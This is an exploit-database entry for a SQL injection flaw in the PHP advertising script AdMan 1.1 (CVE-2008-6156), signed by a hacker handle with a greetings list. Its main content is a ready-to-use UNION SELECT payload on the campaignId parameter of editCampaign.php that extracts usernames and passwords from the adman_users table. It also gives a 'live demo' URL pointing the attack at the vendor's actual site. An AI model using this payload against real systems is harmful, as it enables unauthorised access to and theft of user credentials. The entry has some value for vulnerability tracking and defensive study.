AdMan 1.1.20070907 - 'campaignId' SQL Injection

Author: SuB-ZeRo
type: webapps
platform: php
port: 
date_added: 2008-10-07 
date_updated: 2016-12-26 
verified: 1 
codes: OSVDB-48972;CVE-2008-6156 
tags: 
aliases:  
screenshot_url:  
application_url: 

############### >>> Remote SQL Injection <<<  ###########
##    SuB-ZeRo(Walid)                                                              ##
################## >>> SuB-ZeRo  <<< ################
 author  :  SuB-ZeRo(algeria hackers)
 contact :  FbH@hotmail.com


 buy script : http://www.formfields.com/adManArea/adManPricing.php
dork    : find it
 exploit:
 www.site.me/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/*
 L!Ve DeMo  :::
 http://www.formfields.com/adManArea/adMan1/adMan/advertiser/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/*
 NoTe:YoU must singup and login in web sit and you put your exploit
########### Greetz #############
>>> SuB-ZeRo
>>>my best freinds :: x.CJP.X & ach2008 & carlos the jackel & HiSoK4
>>> all muslims

# milw0rm.com [2008-10-08]